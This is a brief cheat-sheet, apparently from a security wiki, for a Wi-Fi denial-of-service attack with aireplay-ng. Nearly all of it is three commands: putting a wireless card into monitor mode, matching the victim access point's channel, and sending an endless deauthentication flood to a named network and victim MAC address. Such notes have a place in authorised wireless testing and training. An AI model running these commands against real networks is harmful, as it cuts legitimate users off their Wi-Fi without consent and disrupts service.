Aireplay-ng
Aireplay-ng DOS
Information required for DOS
# Place interface into monitor mode
sudo airmon-ng start wlan0
# Match the cards channel to the victim APs channel
sudo iwconfig wlan0mon channel 11
# Start attack
sudo aireplay-ng --deauth 0 -e "My Wifi" -c <victim MAC> --ignore-negative-one wlan0monLast updated